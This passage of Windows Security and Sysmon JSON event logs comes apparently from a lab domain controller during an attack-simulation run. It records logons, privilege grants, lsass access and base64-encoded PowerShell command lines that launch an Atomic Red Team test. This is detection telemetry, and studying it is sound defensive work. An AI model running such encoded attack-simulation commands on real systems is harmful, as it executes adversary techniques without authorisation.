Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-6178966$","ServiceSid":"S-1-5-21-2231640892-1842410504-3836505531-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{421D8777-8FDC-4BB3-5885-E64A7A79C360}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220602,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{421D8777-8FDC-4BB3-5885-E64A7A79C360}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{421D8777-8FDC-4BB3-5885-E64A7A79C360}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220603,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x81AC0\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{421D8777-8FDC-4BB3-5885-E64A7A79C360}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x520\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-6178966\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x81ac0","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-6178966","LogonGuid":"{421D8777-8FDC-4BB3-5885-E64A7A79C360}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220604,"ActivityID":"{C6A61085-67D8-0001-8610-A6C6D867D601}","ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-2231640892-1842410504-3836505531-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x81AC0\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-2231640892-1842410504-3836505531-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x81ac0","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5129,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:12.580\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:12.580","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5130,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:12.580\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:12.580","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5131,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:12.753\r\nProcessGuid: {41C8662E-20D0-5F25-0000-0010871B0800}\r\nProcessId: 2992\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nFileVersion: 10.0.14393.206 (rs1_release.160915-0644)\r\nDescription: Windows PowerShell\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: PowerShell.EXE\r\nCommandLine: \"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADQANwAiACAALQBDAG8AbgBmAGkAcgBtADoAJABmAGEAbABzAGUAIAAtAFQAaQBtAGUAbwB1AHQAUwBlAGMAbwBuAGQAcwAgADMAMAAwACAALQBFAHgAZQBjAHUAdABpAG8AbgBMAG8AZwBQAGEAdABoACAAQwA6AFwAQQB0AG8AbQBpAGMAUgBlAGQAVABlAGEAbQBcAGEAdABjAF8AZQB4AGUAYwB1AHQAaQBvAG4ALgBjAHMAdgA=\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-20CF-5F25-0000-00209EF40700}\r\nLogonId: 0x7F49E\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453\r\nParentProcessGuid: {41C8662E-20CF-5F25-0000-00103D040800}\r\nParentProcessId: 2872\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:12.753","ProcessGuid":"{41C8662E-20D0-5F25-0000-0010871B0800}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","FileVersion":"10.0.14393.206 (rs1_release.160915-0644)","Description":"Windows PowerShell","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"PowerShell.EXE","CommandLine":"\"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADQANwAiACAALQBDAG8AbgBmAGkAcgBtADoAJABmAGEAbABzAGUAIAAtAFQAaQBtAGUAbwB1AHQAUwBlAGMAbwBuAGQAcwAgADMAMAAwACAALQBFAHgAZQBjAHUAdABpAG8AbgBMAG8AZwBQAGEAdABoACAAQwA6AFwAQQB0AG8AbQBpAGMAUgBlAGQAVABlAGEAbQBcAGEAdABjAF8AZQB4AGUAYwB1AHQAaQBvAG4ALgBjAHMAdgA=","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-20CF-5F25-0000-00209EF40700}","LogonId":"0x7f49e","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453","ParentProcessGuid":"{41C8662E-20CF-5F25-0000-00103D040800}","ParentProcessId":"2872","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5132,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:12.752\r\nSourceProcessGUID: {41C8662E-20CF-5F25-0000-00103D040800}\r\nSourceProcessId: 2872\r\nSourceThreadId: 4804\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {41C8662E-20D0-5F25-0000-0010871B0800}\r\nTargetProcessId: 2992\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|UNKNOWN(00007FFD152C8890)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:12.752","SourceProcessGUID":"{41C8662E-20CF-5F25-0000-00103D040800}","SourceProcessId":"2872","SourceThreadId":"4804","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{41C8662E-20D0-5F25-0000-0010871B0800}","TargetProcessId":"2992","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|UNKNOWN(00007FFD152C8890)","EventReceivedTime":"2020-08-01 07:59:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:12","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5133,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:12.752\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20D0-5F25-0000-0010871B0800}\r\nTargetProcessId: 2992\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed 